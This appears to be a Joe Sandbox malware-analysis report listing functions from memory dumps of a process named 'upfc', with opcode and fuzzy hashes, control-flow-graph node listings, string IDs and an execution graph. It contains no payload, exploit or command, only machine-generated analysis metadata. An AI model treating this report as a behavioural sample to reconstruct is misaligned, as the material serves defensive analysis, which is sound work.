                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: 85e5956da6019c02cb3c63999fd8d7e82736a99af89d6a8b6ec8b105dc193566
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 20B00204C5650B01E61435BB1D86569F5605B4D174FD511B0D81D405C798CD55BE5273

                                                      Non-executed Functions

                                                      Function 00007FF7C1B8A520 Relevance: .7, Instructions: 719COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24fa99bf1a9cea87bf3803ee56cd94af1776e6381781cbe679543a0bf130eacf
                                                      • Instruction ID: 0af08622831f9e0b6a45436e3fd71e6dc5f4691fb90b50ab897846d88c4431ab
                                                      • Opcode Fuzzy Hash: 24fa99bf1a9cea87bf3803ee56cd94af1776e6381781cbe679543a0bf130eacf
                                                      • Instruction Fuzzy Hash: A022B330A1CA599FFB48FF28C45A6B9B7A1FF99320F54017ED40DC3293DE6468528B91
                                                      Function 00007FF7C1B87C68 Relevance: .2, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 755956d58b109f958545df45671f8fdb47f506f5eaf118dfb29af89451f081d4
                                                      • Instruction ID: 440164532dde152e8695eee5ed138b51f127f04496a9299d9aed50a8dc73ef68
                                                      • Opcode Fuzzy Hash: 755956d58b109f958545df45671f8fdb47f506f5eaf118dfb29af89451f081d4
                                                      • Instruction Fuzzy Hash: 3571AF709186598FEB49EF68C494AADBBF1FF48310F50067AD04ADB2D2DF74A845CB80

                                                      Execution Graph

                                                      Execution Coverage:4.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:25%
                                                      Total number of Nodes:20
                                                      Total number of Limit Nodes:3
                                                      execution_graph 30035 7ff7c17d2aa8 30036 7ff7c17d7760 30035->30036 30042 7ff7c17d72e0 30036->30042 30038 7ff7c17d778e 30041 7ff7c17d77fc 30038->30041 30046 7ff7c17d7388 30038->30046 30040 7ff7c17d77f0 30043 7ff7c17ee5f0 FindCloseChangeNotification 30042->30043 30045 7ff7c17ee674 30043->30045 30045->30038 30048 7ff7c17d8090 30046->30048 30047 7ff7c17d8245 30048->30047 30051 7ff7c17d7080 30048->30051 30050 7ff7c17d816f 30050->30040 30052 7ff7c17d84c0 30051->30052 30055 7ff7c17d7088 30052->30055 30054 7ff7c17d84c9 30054->30050 30057 7ff7c17d84f0 30055->30057 30056 7ff7c17d9041 30056->30054 30057->30056 30058 7ff7c17d91e3 GetSystemInfo 30057->30058 30059 7ff7c17d921e 30058->30059 30059->30054

                                                      Executed Functions

                                                      Function 00007FF7C17D7088 Relevance: 1.9, APIs: 1, Instructions: 395COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02b3fb261d1673408c2e3b192844cf30a3d50361e551f35ed95a1f23677d4c49
                                                      • Instruction ID: 6830f00d6e6fd84059d2a47d1c6ffee93796bf84a3197e8a66e20517d0649b88
                                                      • Opcode Fuzzy Hash: 02b3fb261d1673408c2e3b192844cf30a3d50361e551f35ed95a1f23677d4c49
                                                      • Instruction Fuzzy Hash: 31D1287190CA898FE716EB28C8557E9BBF0FF5A320F4941BBC049C72D3CA686855C751
                                                      Function 00007FF7C1790D78 Relevance: .3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87933d5be673fd2859d913c4cfc769902be5ef88cf8db6235699ec51a935040d
                                                      • Instruction ID: dab54ed6ad2830bfb1ebbbc8180fce853c64eeb87b04889762dc014202addd6c
                                                      • Opcode Fuzzy Hash: 87933d5be673fd2859d913c4cfc769902be5ef88cf8db6235699ec51a935040d
                                                      • Instruction Fuzzy Hash: 1491BF71E18A998FE789DB6C88687A9BFE1FF59320F4401BEC049C77D6CBB814158741
                                                      Function 00007FF7C1B8000A Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6$)S6
                                                      • API String ID: 0-2148181013
                                                      • Opcode ID: c68eb47d02f4600564609a9c7ab7156f35f0d09d0d1f592d198cd0da1d3146bb
                                                      • Instruction ID: 464d11cc1245161552339850f2c6fabd937d1ebf18d06b081246354425a64a98
                                                      • Opcode Fuzzy Hash: c68eb47d02f4600564609a9c7ab7156f35f0d09d0d1f592d198cd0da1d3146bb
                                                      • Instruction Fuzzy Hash: AD513631A0D3858FE35A7E285811031BFE0DF477B0BA510BFE4CAC7593E898A8068762
                                                      Function 00007FF7C1B84FA4 Relevance: 3.9, Strings: 3, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6$)S6
                                                      • API String ID: 0-2148181013
                                                      • Opcode ID: 66ee49163140a60f779fc6a4f1597f4032db20921927de430100dd262e8eb5a9
                                                      • Instruction ID: 11a54eb4d3d4ce98def2dc28e523f46f3982c916b15b32e08af91041ee4b58cf
                                                      • Opcode Fuzzy Hash: 66ee49163140a60f779fc6a4f1597f4032db20921927de430100dd262e8eb5a9
                                                      • Instruction Fuzzy Hash: 7851183190C745CFF329BE199941075FBE0EF49368B60197FD48EC3A93DA69B4428BA1
                                                      Function 00007FF7C1B821C7 Relevance: 3.0, Strings: 2, Instructions: 481COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 59 7ff7c1b821c7-7ff7c1b821cd 60 7ff7c1b821ef-7ff7c1b82200 59->60 61 7ff7c1b821cf-7ff7c1b821d3 59->61 64 7ff7c1b8237a-7ff7c1b82395 60->64 65 7ff7c1b82206-7ff7c1b8221b 60->65 62 7ff7c1b821d9-7ff7c1b821ea 61->62 63 7ff7c1b822d3-7ff7c1b822e4 61->63 66 7ff7c1b82331-7ff7c1b82345 62->66 68 7ff7c1b822eb-7ff7c1b822f6 63->68 69 7ff7c1b822e6 63->69 76 7ff7c1b8239d 64->76 77 7ff7c1b82397 64->77 65->64 67 7ff7c1b82221-7ff7c1b8222d 65->67 70 7ff7c1b8234c-7ff7c1b82357 66->70 71 7ff7c1b82347 66->71 73 7ff7c1b8225e-7ff7c1b82274 call 7ff7c1b81b70 67->73 74 7ff7c1b8222f-7ff7c1b82246 call 7ff7c1b80680 67->74 69->68 71->70 73->63 86 7ff7c1b82276-7ff7c1b82281 73->86 74->63 83 7ff7c1b8224c-7ff7c1b8225b call 7ff7c1b807b0 74->83 80 7ff7c1b823a1-7ff7c1b82403 76->80 81 7ff7c1b8239f 76->81 77->76 103 7ff7c1b8240e-7ff7c1b8242c 80->103 104 7ff7c1b823cb-7ff7c1b82407 80->104 81->80 84 7ff7c1b823e1-7ff7c1b823e3 81->84 83->73 90 7ff7c1b8242e-7ff7c1b82460 84->90 91 7ff7c1b823e5-7ff7c1b82400 84->91 86->64 89 7ff7c1b82287-7ff7c1b8229c 86->89 89->64 93 7ff7c1b822a2-7ff7c1b822b5 89->93 99 7ff7c1b82548-7ff7c1b8254d 90->99 97 7ff7c1b82309-7ff7c1b82311 93->97 98 7ff7c1b822b7-7ff7c1b822d1 call 7ff7c1b80680 93->98 102 7ff7c1b82319-7ff7c1b8231c 97->102 98->63 111 7ff7c1b822f7-7ff7c1b82306 call 7ff7c1b807b0 98->111 120 7ff7c1b8247c-7ff7c1b82557 99->120 121 7ff7c1b82561-7ff7c1b8257f 99->121 108 7ff7c1b82323-7ff7c1b8232b 102->108 104->84 108->66 113 7ff7c1b8216a-7ff7c1b82177 108->113 111->97 113->108 116 7ff7c1b8217d-7ff7c1b82191 113->116 116->108 131 7ff7c1b8252d-7ff7c1b82545 120->131 132 7ff7c1b824a6-7ff7c1b824a9 120->132 131->99 132->131 133 7ff7c1b824af-7ff7c1b824b2 132->133 134 7ff7c1b8251b-7ff7c1b82522 133->134 135 7ff7c1b824b4-7ff7c1b824e1 133->135 136 7ff7c1b82524-7ff7c1b8252c 134->136 137 7ff7c1b824e2-7ff7c1b824fc 134->137 139 7ff7c1b82502-7ff7c1b8250d 137->139 140 7ff7c1b82581-7ff7c1b825a8 137->140 139->140 141 7ff7c1b8250f-7ff7c1b82519 139->141 144 7ff7c1b825aa-7ff7c1b825d1 140->144 145 7ff7c1b825d4-7ff7c1b826b8 140->145 141->134 162 7ff7c1b8264d-7ff7c1b82696 call 7ff7c1b826c2 145->162 163 7ff7c1b82677-7ff7c1b826c0 call 7ff7c1b826c2 145->163 173 7ff7c1b82686-7ff7c1b8268c 163->173
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: ce59deba66772b7d73b4ba27355089940c02bb4a64216de7c130eb1b8f91249c
                                                      • Instruction ID: c85197cca4ecfcb91fb9551dabd8763d475fda3dee54daa4bfb6c82bb35be3eb
                                                      • Opcode Fuzzy Hash: ce59deba66772b7d73b4ba27355089940c02bb4a64216de7c130eb1b8f91249c
                                                      • Instruction Fuzzy Hash: 45F1E23090CE468FE758EF18C4915B9B7A1FF44720BA415BED44EC3A83DAA9B841CF61
                                                      Function 00007FF7C1B871B1 Relevance: 2.9, Strings: 2, Instructions: 406COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 175 7ff7c1b871b1 176 7ff7c1b871b6-7ff7c1b871be 175->176 177 7ff7c1b871c4-7ff7c1b871d6 call 7ff7c1b86b80 176->177 178 7ff7c1b87341-7ff7c1b87355 176->178 183 7ff7c1b871d8-7ff7c1b871dd 177->183 184 7ff7c1b871a5-7ff7c1b871ac 177->184 179 7ff7c1b8735c-7ff7c1b87367 178->179 180 7ff7c1b87357 178->180 180->179 185 7ff7c1b871ff-7ff7c1b87210 183->185 186 7ff7c1b871df-7ff7c1b871e3 183->186 187 7ff7c1b87380-7ff7c1b87385 184->187 190 7ff7c1b8738a-7ff7c1b873a5 185->190 191 7ff7c1b87216-7ff7c1b8722b 185->191 188 7ff7c1b871e9-7ff7c1b871fa 186->188 189 7ff7c1b872e3-7ff7c1b872f4 186->189 187->175 188->178 193 7ff7c1b872fb-7ff7c1b87306 189->193 194 7ff7c1b872f6 189->194 199 7ff7c1b873ad 190->199 200 7ff7c1b873a7 190->200 191->190 192 7ff7c1b87231-7ff7c1b8723d 191->192 195 7ff7c1b8726e-7ff7c1b87284 call 7ff7c1b86b80 192->195 196 7ff7c1b8723f-7ff7c1b87256 call 7ff7c1b85690 192->196 194->193 195->189 209 7ff7c1b87286-7ff7c1b87291 195->209 196->189 206 7ff7c1b8725c-7ff7c1b8726b call 7ff7c1b857c0 196->206 203 7ff7c1b873b1-7ff7c1b87413 199->203 204 7ff7c1b873af 199->204 200->199 224 7ff7c1b8741e-7ff7c1b8743c 203->224 225 7ff7c1b873db-7ff7c1b87417 203->225 204->203 207 7ff7c1b873f1-7ff7c1b873f3 204->207 206->195 211 7ff7c1b8743e-7ff7c1b87470 207->211 212 7ff7c1b873f5-7ff7c1b87410 207->212 209->190 210 7ff7c1b87297-7ff7c1b872ac 209->210 210->190 215 7ff7c1b872b2-7ff7c1b872c5 210->215 226 7ff7c1b87558-7ff7c1b8755d 211->226 218 7ff7c1b87319-7ff7c1b87321 215->218 219 7ff7c1b872c7-7ff7c1b872e1 call 7ff7c1b85690 215->219 229 7ff7c1b87329-7ff7c1b8732c 218->229 219->189 232 7ff7c1b87307-7ff7c1b87316 call 7ff7c1b857c0 219->232 225->207 245 7ff7c1b8748c-7ff7c1b87567 226->245 246 7ff7c1b87571-7ff7c1b8758f 226->246 234 7ff7c1b87333-7ff7c1b8733b 229->234 232->218 234->178 236 7ff7c1b8717a-7ff7c1b87187 234->236 236->234 242 7ff7c1b8718d-7ff7c1b871a1 236->242 242->234 254 7ff7c1b8753d-7ff7c1b87555 245->254 255 7ff7c1b874b6-7ff7c1b874b9 245->255 254->226 255->254 256 7ff7c1b874bf-7ff7c1b874c2 255->256 257 7ff7c1b8752b-7ff7c1b87532 256->257 258 7ff7c1b874c4-7ff7c1b874f1 256->258 259 7ff7c1b87534-7ff7c1b8753c 257->259 260 7ff7c1b874f2-7ff7c1b8750c 257->260 262 7ff7c1b87512-7ff7c1b8751d 260->262 263 7ff7c1b87591-7ff7c1b875e1 call 7ff7c1b83dd0 260->263 262->263 264 7ff7c1b8751f-7ff7c1b87529 262->264 264->257
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 4845580825ac02183d184a707e1d35f42f5cff3c073928bb2d21b03221461cc4
                                                      • Instruction ID: db4aae2398d0b39b89d345fb8d5e67fdb5433a1326b1da56740c07f4a322eb47
                                                      • Opcode Fuzzy Hash: 4845580825ac02183d184a707e1d35f42f5cff3c073928bb2d21b03221461cc4
                                                      • Instruction Fuzzy Hash: D3D1263090CB468FE358EF28D491575F7E1FF44728BA4157EC44EC3A92DAA9B8428F61
                                                      Function 00007FF7C1B80A12 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 272 7ff7c1b80a12-7ff7c1b80a19 273 7ff7c1b80c35-7ff7c1b80c46 272->273 274 7ff7c1b80a1f-7ff7c1b80a51 call 7ff7c1b807b0 call 7ff7c1b80680 272->274 275 7ff7c1b80c4d-7ff7c1b80c58 273->275 276 7ff7c1b80c48 273->276 274->273 281 7ff7c1b80a57-7ff7c1b80aa9 call 7ff7c1b807b0 call 7ff7c1b80680 274->281 276->275 281->273 288 7ff7c1b80aaf-7ff7c1b80af4 call 7ff7c1b807b0 281->288 294 7ff7c1b80af6-7ff7c1b80b0a call 7ff7c1b80680 288->294 295 7ff7c1b80b64-7ff7c1b80ba0 288->295 294->273 299 7ff7c1b80b10-7ff7c1b80b33 call 7ff7c1b807b0 294->299 303 7ff7c1b80bd9-7ff7c1b80bde 295->303 304 7ff7c1b80b39-7ff7c1b80b49 299->304 305 7ff7c1b80d05-7ff7c1b80d1c 299->305 306 7ff7c1b80be5-7ff7c1b80bea 303->306 304->305 307 7ff7c1b80b4f-7ff7c1b80b62 304->307 313 7ff7c1b80d1e 305->313 314 7ff7c1b80d1f-7ff7c1b80d2d 305->314 308 7ff7c1b80bec-7ff7c1b80bee 306->308 309 7ff7c1b80ba2-7ff7c1b80bc2 306->309 307->294 307->295 308->273 311 7ff7c1b80bf0-7ff7c1b80bf3 308->311 309->305 312 7ff7c1b80bc8-7ff7c1b80bd3 309->312 317 7ff7c1b80bf9-7ff7c1b80c14 311->317 318 7ff7c1b80bf5 311->318 312->303 319 7ff7c1b80cbb-7ff7c1b80ccf 312->319 313->314 315 7ff7c1b80d35 314->315 316 7ff7c1b80d2f 314->316 320 7ff7c1b80d39-7ff7c1b80d78 315->320 321 7ff7c1b80d37 315->321 316->315 317->305 322 7ff7c1b80c1a-7ff7c1b80c33 call 7ff7c1b80680 317->322 318->317 323 7ff7c1b80cd6-7ff7c1b80ce1 319->323 324 7ff7c1b80cd1 319->324 325 7ff7c1b80d79 320->325 326 7ff7c1b80d7a-7ff7c1b80fba 320->326 321->320 321->325 322->273 330 7ff7c1b80c59-7ff7c1b80c72 call 7ff7c1b807b0 322->330 324->323 325->326 330->305 334 7ff7c1b80c78-7ff7c1b80c7f 330->334 335 7ff7c1b80ca9-7ff7c1b80cb1 334->335 336 7ff7c1b80cb3-7ff7c1b80cb9 335->336 337 7ff7c1b80c81-7ff7c1b80c9d 335->337 336->319 339 7ff7c1b80ce2 336->339 337->305 338 7ff7c1b80c9f-7ff7c1b80ca7 337->338 338->335 339->305
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 952cf8f1a7529dd96a3f0c9bc76369dff04acbc57bcc4eff3b3193f6f16b8b17
                                                      • Instruction ID: ff3ab29681879012470236429417a56880eb4727b9d663a7d283e5409066aa79
                                                      • Opcode Fuzzy Hash: 952cf8f1a7529dd96a3f0c9bc76369dff04acbc57bcc4eff3b3193f6f16b8b17
                                                      • Instruction Fuzzy Hash: 2EC19D30A08A4A9FE749EF28C4906A5B7A1FF58750F94517EC44EC7E86CB68F851CF90
                                                      Function 00007FF7C1B85A7A Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 340 7ff7c1b85a7a-7ff7c1b85a84 341 7ff7c1b85abc-7ff7c1b85b04 call 7ff7c1b857c0 340->341 342 7ff7c1b85a86-7ff7c1b85a8b 340->342 349 7ff7c1b85b06-7ff7c1b85b1a call 7ff7c1b85690 341->349 350 7ff7c1b85b74-7ff7c1b85b8b 341->350 342->341 354 7ff7c1b85c45-7ff7c1b85c56 349->354 355 7ff7c1b85b20-7ff7c1b85b43 call 7ff7c1b857c0 349->355 353 7ff7c1b85b92-7ff7c1b85bb0 350->353 361 7ff7c1b85be9-7ff7c1b85bee 353->361 357 7ff7c1b85c5d-7ff7c1b85c68 354->357 358 7ff7c1b85c58 354->358 362 7ff7c1b85b49-7ff7c1b85b59 355->362 363 7ff7c1b85d15-7ff7c1b85d2c 355->363 358->357 364 7ff7c1b85bf5-7ff7c1b85bfa 361->364 362->363 365 7ff7c1b85b5f-7ff7c1b85b72 362->365 370 7ff7c1b85d2e 363->370 371 7ff7c1b85d2f-7ff7c1b85d3d 363->371 366 7ff7c1b85bfc-7ff7c1b85bfe 364->366 367 7ff7c1b85bb2-7ff7c1b85bd2 364->367 365->349 365->350 366->354 372 7ff7c1b85c00-7ff7c1b85c03 366->372 367->363 369 7ff7c1b85bd8-7ff7c1b85be3 367->369 369->361 373 7ff7c1b85ccb-7ff7c1b85cdf 369->373 370->371 374 7ff7c1b85d45 371->374 375 7ff7c1b85d3f 371->375 376 7ff7c1b85c09-7ff7c1b85c24 372->376 377 7ff7c1b85c05 372->377 380 7ff7c1b85ce6-7ff7c1b85cf1 373->380 381 7ff7c1b85ce1 373->381 378 7ff7c1b85d49-7ff7c1b85d88 374->378 379 7ff7c1b85d47 374->379 375->374 376->363 382 7ff7c1b85c2a-7ff7c1b85c43 call 7ff7c1b85690 376->382 377->376 383 7ff7c1b85d89 378->383 384 7ff7c1b85d8a-7ff7c1b85fca 378->384 379->378 379->383 381->380 382->354 388 7ff7c1b85c69-7ff7c1b85c82 call 7ff7c1b857c0 382->388 383->384 388->363 392 7ff7c1b85c88-7ff7c1b85c8f 388->392 393 7ff7c1b85cb9-7ff7c1b85cc1 392->393 394 7ff7c1b85cc3-7ff7c1b85cc9 393->394 395 7ff7c1b85c91-7ff7c1b85cad 393->395 394->373 397 7ff7c1b85cf2 394->397 395->363 396 7ff7c1b85caf-7ff7c1b85cb7 395->396 396->393 397->363
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: a1dd210c9cdb723d61e8265989d17817d997c591e09cec69f7f771b7e5d9c957
                                                      • Instruction ID: 6470914be634c3c7b14dcb78e55ca571d6e7d4cbc4a449d1947d4fd113f0476b
                                                      • Opcode Fuzzy Hash: a1dd210c9cdb723d61e8265989d17817d997c591e09cec69f7f771b7e5d9c957
                                                      • Instruction Fuzzy Hash: 37A1C03090CA468FE749EF28C5946A4F7A1FF15324F9451BDC44EC7A86CB68B891CFA0
                                                      Function 00007FF7C1B85079 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 7ff7c1b85079-7ff7c1b850d9 423 7ff7c1b85198 421->423 425 7ff7c1b850e3-7ff7c1b850eb 423->425 426 7ff7c1b850ed-7ff7c1b851be 425->426 427 7ff7c1b8514c-7ff7c1b8514d 425->427 444 7ff7c1b8510e-7ff7c1b85121 426->444 429 7ff7c1b85154-7ff7c1b85156 427->429 429->425 432 7ff7c1b85158-7ff7c1b85163 429->432 433 7ff7c1b85165-7ff7c1b85169 432->433 434 7ff7c1b8516f-7ff7c1b85181 432->434 433->425 433->434 437 7ff7c1b85188-7ff7c1b85197 434->437 438 7ff7c1b85183 434->438 437->423 438->437 444->427 445 7ff7c1b85123-7ff7c1b85135 444->445 446 7ff7c1b8513c-7ff7c1b8514b 445->446 447 7ff7c1b85137 445->447 447->446
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: fedc6acb2cb61cb7e60c3a30f05a82ac5d4be618900120065b2a72672c183a2e
                                                      • Instruction ID: 51407bdc4bb495d3df0d938571249886e4c30e35cb6a3ae4c92894ce78e39acd
                                                      • Opcode Fuzzy Hash: fedc6acb2cb61cb7e60c3a30f05a82ac5d4be618900120065b2a72672c183a2e
                                                      • Instruction Fuzzy Hash: 6431F63190C741CFF3197E298905075BBE0EF4A768B64257FD4CEC7593E99874428BA1
                                                      Function 00007FF7C1B80570 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 448 7ff7c1b80570-7ff7c1b8057f 450 7ff7c1b80581-7ff7c1b805b3 448->450 451 7ff7c1b805bf-7ff7c1b805cf 448->451 458 7ff7c1b805ba-7ff7c1b805bd 450->458 452 7ff7c1b805d6-7ff7c1b805df 451->452 453 7ff7c1b805d1 451->453 453->452 458->451 459 7ff7c1b80602-7ff7c1b80613 458->459 460 7ff7c1b8061a-7ff7c1b80623 459->460 461 7ff7c1b80615 459->461 461->460
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: df30c3950fb19baceb92186b6f7acdce0a98dbc6fc1c014859addcafbfba0272
                                                      • Instruction ID: d53a1fb380eebf54d567bbad3fcdd5a1edb0d922c0fce0fba2a6104236c324ec
                                                      • Opcode Fuzzy Hash: df30c3950fb19baceb92186b6f7acdce0a98dbc6fc1c014859addcafbfba0272
                                                      • Instruction Fuzzy Hash: 5C110431E08A0A4EEB54BE25C8114F6B3D1FF583A0B90053AE04EC76D3DE68F94587A0
                                                      Function 00007FF7C1B85580 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 462 7ff7c1b85580-7ff7c1b8558f 464 7ff7c1b85591-7ff7c1b855c3 462->464 465 7ff7c1b855cf-7ff7c1b855df 462->465 472 7ff7c1b855ca-7ff7c1b855cd 464->472 466 7ff7c1b855e6-7ff7c1b855ef 465->466 467 7ff7c1b855e1 465->467 467->466 472->465 473 7ff7c1b85612-7ff7c1b85623 472->473 474 7ff7c1b8562a-7ff7c1b85633 473->474 475 7ff7c1b85625 473->475 475->474
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 56abd15d00c2944a2847cd205d38faee3fca2ab3f0c3ed8c0644cb3f7d501d04
                                                      • Instruction ID: 981765f3c18c68d76ca356ced75bf597c5582dfb856246d331d810cb42bc7de2
                                                      • Opcode Fuzzy Hash: 56abd15d00c2944a2847cd205d38faee3fca2ab3f0c3ed8c0644cb3f7d501d04
                                                      • Instruction Fuzzy Hash: D011C431E0CA0A8FEB55FE25D4115F6B3D1EF583A5B90053AE00EC75D3DE68B84587A0
                                                      Function 00007FF7C1B803EE Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 476 7ff7c1b803ee-7ff7c1b803f2 477 7ff7c1b803f8-7ff7c1b803fc 476->477 478 7ff7c1b805bf-7ff7c1b805cf 476->478 481 7ff7c1b80406-7ff7c1b8040a 477->481 479 7ff7c1b805d6-7ff7c1b805df 478->479 480 7ff7c1b805d1 478->480 480->479 482 7ff7c1b8040c 481->482 483 7ff7c1b80410-7ff7c1b80419 481->483 482->483 484 7ff7c1b80536-7ff7c1b80549 483->484 485 7ff7c1b8041f-7ff7c1b80433 483->485 486 7ff7c1b8054b 484->486 487 7ff7c1b80550-7ff7c1b80559 484->487 485->484 486->487
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: cba800141b725f593c5046494a41a4ce08b346d045e5490bf25f14674b940bef
                                                      • Instruction ID: 48c2e47d1fc24cd44936bf65d840c2aa5d2d198f5486a8b33d60b0703a47542b
                                                      • Opcode Fuzzy Hash: cba800141b725f593c5046494a41a4ce08b346d045e5490bf25f14674b940bef
